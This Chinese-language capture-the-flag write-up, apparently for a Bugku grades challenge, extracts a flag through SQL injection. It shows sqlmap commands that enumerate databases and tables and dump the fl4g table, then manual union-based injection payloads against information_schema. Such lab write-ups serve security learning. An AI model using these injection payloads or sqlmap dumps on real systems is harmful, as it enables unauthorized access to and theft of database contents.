方法一:打开题目输入1,F12发现注入点为post传参
bp抓下包,把代码盘下来创一个文件在c盘,在文件夹里创建一个txt复制
然后启动我们的sqlmap,复制txt的绝对路径(也可以在bp中把包复制成txt放入sqlmap目录中)python sqlmap.py -r “C:\grades.bugku\1.txt”
连存在的注入类型也报出来了
–dbs 获取所有数据库
python sqlmap.py -r “C:\grades.bugku\1.txt” --dbs
获取skctf下的表
Sqlmap -r “C:\grades.bugku\1.txt” -D skctf --tables
获取fl4g中的所有内容
Sqlmap -r “C:\grades.bugku\1.txt” -D skctf -T fl4g --dump
方法二:通过试id=1 id=2 id=3 id=4…知到到4就没有数据了,有姓名,语数外4个字段,id=x ,‘x’字符满足union查询不到回显下一个查询结果
所以注入id=o’ union select 1,2,3,4#查询数据库名
id=a’ union select 1,2,3,4#
发现数据库名skctf
查询表明id=o’ union select 1,2,3,table_name from information_schema.tables where table_schema=‘skctf’#查询列名
id=o’ union select 1,2,3,column_name from information_schema.columns where table_name=‘fl4g’#查询内容
id=o’ union select 1,2,3,skctf_flag from fl4g#,拿到flag